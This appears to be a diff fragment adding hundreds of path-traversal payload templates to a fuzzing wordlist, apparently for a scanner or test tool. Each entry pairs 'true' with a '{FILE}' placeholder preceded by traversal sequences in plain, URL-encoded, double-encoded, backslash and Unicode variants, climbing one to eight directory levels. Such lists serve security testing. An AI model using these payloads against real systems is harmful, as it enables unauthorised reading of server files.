+ "true,..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,\\../{FILE}",
+ "true,\\../\\../{FILE}",
+ "true,\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,/..\\{FILE}",
+ "true,/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,.../{FILE}",
+ "true,.../.../{FILE}",
+ "true,.../.../.../{FILE}",
+ "true,.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../.../{FILE}",
+ "true,...\\{FILE}",
+ "true,...\\...\\{FILE}",
+ "true,...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,..../{FILE}",
+ "true,..../..../{FILE}",
+ "true,..../..../..../{FILE}",
+ "true,..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../..../{FILE}",
+ "true,....\\{FILE}",
+ "true,....\\....\\{FILE}",
+ "true,....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,........................................................................../{FILE}",
+ "true,........................................................................../../{FILE}",
+ "true,........................................................................../../../{FILE}",
+ "true,........................................................................../../../../{FILE}",
+ "true,........................................................................../../../../../{FILE}",
+ "true,........................................................................../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../../{FILE}",
+ "true,..........................................................................\\{FILE}",
+ "true,..........................................................................\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%u2215{FILE}",
+ "true,..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,..%u2216{FILE}",
+ "true,..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%uEFC8{FILE}",
